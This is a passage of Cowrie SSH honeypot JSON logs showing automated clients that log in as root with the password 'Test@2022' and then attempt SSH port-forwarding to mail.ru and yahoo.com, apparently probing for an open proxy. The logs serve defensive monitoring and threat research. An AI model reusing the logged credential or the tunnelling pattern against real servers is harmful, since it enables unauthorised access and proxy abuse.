"ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.031427Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.118023Z","src_ip":"212.227.235.229","session":"c60e4489ac0a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.165582Z","src_ip":"212.227.235.229","session":"c60e4489ac0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.279137Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3416,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3416","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.329609Z","session":"ad02be6964b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.379312Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":4809,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:4809","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.519993Z","session":"ad02be6964b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.569699Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31950,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31950","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.712118Z","session":"ad02be6964b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.761880Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.812210Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36784,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a8ed561cefd","protocol":"ssh","message":"New connection: 77.83.207.83:36784 (1.2.3.4:22) [session: 5a8ed561cefd]","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.861871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.862750Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:51.913542Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.145651Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.146892Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.163136Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8362,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8362","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.214401Z","session":"5a8ed561cefd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.264684Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":18197,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18197","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.408367Z","session":"5a8ed561cefd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.458620Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":12919,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12919","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.600412Z","session":"5a8ed561cefd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.650426Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.701313Z","src_ip":"77.83.207.83","session":"5a8ed561cefd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36875,"dst_ip":"1.2.3.4","dst_port":22,"session":"26632585c844","protocol":"ssh","message":"New connection: 77.83.207.83:36875 (1.2.3.4:22) [session: 26632585c844]","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.750534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.751449Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:52.802505Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.055291Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11279,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11279","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.107264Z","session":"26632585c844"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.158123Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30539,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30539","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.301197Z","session":"26632585c844"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.352055Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":17622,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17622","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.497338Z","session":"26632585c844"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.548071Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.599415Z","src_ip":"77.83.207.83","session":"26632585c844"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36960,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2c60b581219","protocol":"ssh","message":"New connection: 77.83.207.83:36960 (1.2.3.4:22) [session: e2c60b581219]","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.649508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.659688Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.700597Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:53.951465Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19242,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19242","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.002941Z","session":"e2c60b581219"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.053336Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":6317,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6317","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.196727Z","session":"e2c60b581219"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.247111Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5013,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5013","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.388646Z","session":"e2c60b581219"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.438980Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.490287Z","src_ip":"77.83.207.83","session":"e2c60b581219"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37040,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f002279646a","protocol":"ssh","message":"New connection: 77.83.207.83:37040 (1.2.3.4:22) [session: 8f002279646a]","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.539420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.540154Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.590307Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.839315Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32310,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32310","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.890881Z","session":"8f002279646a"}
